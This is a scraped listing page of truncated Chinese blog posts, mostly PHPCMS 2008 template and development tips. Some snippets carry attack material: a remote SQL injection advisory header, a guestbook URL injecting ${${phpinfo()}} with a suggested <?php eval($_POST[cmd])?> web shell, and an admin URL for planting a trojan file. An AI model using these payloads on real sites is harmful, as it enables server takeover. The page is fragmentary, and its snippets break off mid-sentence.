=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[~] Tybe: REMOTE SQL iNJECTioN [~] Vendor: www.phpcms.cn
[+] Software: P
转载
精选
2011-01-19 17:07:09
632阅读
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[~] Tybe: REMOTE SQL iNJECTioN
[~] Vendor: www.phpcms.cn
[+] Software:
转载
精选
2011-01-21 02:08:29
605阅读
PHPCMS 2008 密码加密方式
phpcms 2008 密码加密方式: $password = md5(PASSWORD_KEY.$password);
其中PASSWORD_KEY为安装时输入的“会员密码密钥“(在/include/config.inc.php文件中)。
注:修改密码时要修改两个表member和member_cach
原创
2010-08-23 13:39:19
1318阅读
从现在开始我把我用phpcms2008做站的一些经验写出来.
phpcms官方现在都不对2008版 进行升级了,都改用V9了.相对改动比较大.2008有个强大的万能get标签 再加上可以自己写php代码 在调用语句里 结合着用 非常方便.安全方面也比dedecms的要强.
我也是一个新手,接触程序也不到一年,后悔起步比较晚.还请大家多多指教!
原创
2012-06-20 16:59:45
342阅读
guestbook/index.php?keywords=test&&page=3&${${phpinfo()}} phpinfo替换成<?php eval($_POST[cmd])?> <?php eval($_POST[cmd])?> index.php?keywords=test&&page=3&${
转载
精选
2012-07-10 13:46:43
909阅读
get 标签可调用本系统和外部数据,适合熟悉SQL语句的人使用。注意:get标签属性值必须用双引号括起来
1、调用本系统单条数据,示例(调用ID为1的信息,标题长度不超过25个汉字,显示更新日期):
{get sql="select * from phpcms_content where contentid=1" /}
标题:{str_cut($r[title], 5
转载
精选
2011-04-22 17:26:09
670阅读
get 标签可调用本系统和外部数据,适合熟悉SQL语句的人使用。注意:get标签属性值必须用双引号括起来
1、调用本系统单条数据,示例(调用ID为1的信息,标题长度不超过25个汉字,显示更新日期):
{get sql="select * from phpcms_content where contentid=1" /}
标题:{str_cut($r[title
原创
2012-03-14 09:29:44
521阅读
phpcms2008 系统变量 用户变量: $_userid 用户id $_username 用户名 $_areaid 地区id $_groupid 用户组id $_model
原创
2011-01-29 15:27:00
251阅读
对于phpcms2008的url规则,我有好一段时间没怎么弄明白,只知表向而不知内在原理的那种.但通过做过几个站之后,突然恍然大悟:原来就是这样啊.
我的理解就是url规则就是生成静态的目录格式:比如是一层的 还是二层多层目录啊,目录都以什么命名啊这些.通过这样理解我就很清楚了,而且自然而然的知道怎么改了.
记住下面一些变量分别代表什么意思,就什么都好办
原创
2012-07-16 20:42:52
512阅读
phpcms2008有个if判断很有用,可以灵活实现很多功能与需求,但也有些应用方面的问题。下面写点我遇到过的一些问题。
头部文件里一般会用到判断首页 栏目页 内容页 用不同的CSS文件或JS文件,要实现很简单:首页只要判断{if $catid==0}***{/if}就可以了 里面放你想要放的代码;栏目页{if $catid>0}***{/if}; 内容页{if $
原创
2012-08-24 12:51:57
436阅读
要的效果: 当前 所在位置: 您 当前 所在位置:首页>>产品>>蒲公英系列>>服装管理系统>>产品详情 但放入调用标签: 您 当前 所在位置:<a href="">首页</a>>>{catpos($r['catid'])}产品详情 得到的效果是: 首页>>产品蒲公英系列>>服装管理系统>>产品详情 少了>> 汗,看了下global.func. php 文件发现这段: function catpos($catid, $urlru Read More
转载
2013-04-13 23:58:00
32阅读
2评论
PRODUCT NAME: Enable Media Replace WordPress Plugin
PRODUCT URL 1: http://wordpress.org/extend/plugins/enable-media-replace/
PRODUCT URL 2: http://mansjonasson.se/wordpres
转载
精选
2011-02-11 14:51:15
526阅读
http://www.xxx.com/admin.php?mod=phpcms&file=safe&action=see_code&files=test.php
直接在文件源代码里写入木马后,点修改就可以了,test.php马就在根目录下了
转载
精选
2010-12-27 23:38:35
829阅读
phpcms2008几个基本模板文件是构成网站最重要的部分,分别是index.html(首页),list.html(列表页),category.html(栏目页),show.html(内容页).我们改的时候尽量不要改掉系统原来的名字,直接在原模板里改,后面会省很多事.特别是内容页模板,如果你改掉,到时你发的每一篇文章,都要去另外选下模板,文章多了累死你.
好了,inde
原创
2012-07-05 11:41:55
970阅读
1、模块目录说明。
install 模块安装目录,安装模块时调用
uninstall 模块卸载目录,卸载模块时调用
admin 模块的后台管理目录
api 个人空间添加的应用API接口
include 引用文件目录
2、
转载
精选
2010-08-11 18:23:41
465阅读
PHPCMS2008源码模板原理分析
<?php
PHPCMS2008模版原理篇
一、config.inc.php 里面关于模版的相关配置变量
//模板相关配置
推荐
原创
2010-08-10 17:19:17
1762阅读
1评论
来自:http://superman.php100.com/昨天看见phpcms v9.1.15爆的xss和无权限的sql注入,于是就想测试下利用xss执行sql注入,虽然爆的这个phpcms漏洞还有很多其他的用法!但是,这个注入我没有找到phpcms v9.1.15测试,其他版本都没有测试成功!于是乎我只有假想下一个极端环境:1.前台有且只有一个xss漏洞(不能获取管理员co
转载
精选
2012-09-17 15:31:54
595阅读
点赞
2评论
PHPCMS 的模块安装是通过后台管理面板 系统设置->模块管理->安装模块 来实现的,其对应的地址是 admin.php?mod=phpcms&file=module&action=install
接下来我先简单分析g根目录下的 admin.php 文件。
admin.php 前面的一系列是一些权限的判断,这里我暂且不予关心。这里我们
转载
精选
2010-08-11 18:02:47
599阅读
phpcms2008栏目页模板category.html与列表页模板list.html:在栏目下面还有子栏目的时候,这个栏目应用的是category模板,只有当栏目下没有子栏目的时候才用的是list模板.
category模板里面的调用的两种方法:1种是官方的调用
{loop $arrchildid $cid $c}
{$c[catname]} {$c[url]
原创
2012-07-14 11:11:21
820阅读
点赞
3评论
今天在写tp的时候想写个清除缓存的函数。考虑到生成缓存的里面会有很多文件夹。所以看了下phpcms的文件删除模式。发现写的很好。贡献下吧。不是我写的function dir_list($path,$exts='',$list=array()){ $path = dir_path($path); $files = glob($path.'*'); //查出来底下所有的 foreach
原创
2023-01-31 11:27:26
112阅读
